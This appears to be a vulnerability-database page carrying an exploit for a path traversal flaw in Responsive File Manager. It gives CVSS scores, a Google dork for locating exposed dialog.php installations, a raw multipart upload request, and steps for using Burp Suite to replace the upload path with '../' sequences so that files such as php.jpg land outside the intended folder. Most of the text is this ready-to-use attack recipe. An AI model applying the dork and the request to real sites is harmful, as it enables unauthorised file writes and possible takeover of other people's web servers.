Responsive File Manager with Path Traversal

Risk: Medium
Local: No
Remote: Yes

CVSS Base Score: 5.8/10
Impact Subscore: 4.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: Partial

Exploit Title: Responsive File Manager with Path Traversal Author: L4663r666h05t x Indonesian Code Party Vendor Homepage: Dork: inurl:/filemanager/ "dialog.php" Reference Links: You need burpsuite in this case. Request: ------------------------------------------------- ------WebKitFormBoundary00YRAbg8d9xdbAiC Content-Disposition: form-data; name="path" ../source/ ------WebKitFormBoundary00YRAbg8d9xdbAiC Content-Disposition: form-data; name="path_thumb" ../thumbs/ ------WebKitFormBoundary00YRAbg8d9xdbAiC Content-Disposition: form-data; name="file"; filename="hworld.txt" Content-Type: text/plain - hello world ! - ------WebKitFormBoundary00YRAbg8d9xdbAiC-- ------------------------------------------------- Upload file in dialog.php (txt, html, php.jpg, php.fla, or php.accdb ) Start the burpsuite change "../source/" into "../../../" or "../../" or "../" (the number that the directory is replaced with ../) ------------------------------------------------- Greetz: Exploiter ID - Indonesian Code Party - L@T


Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022,


Back to Top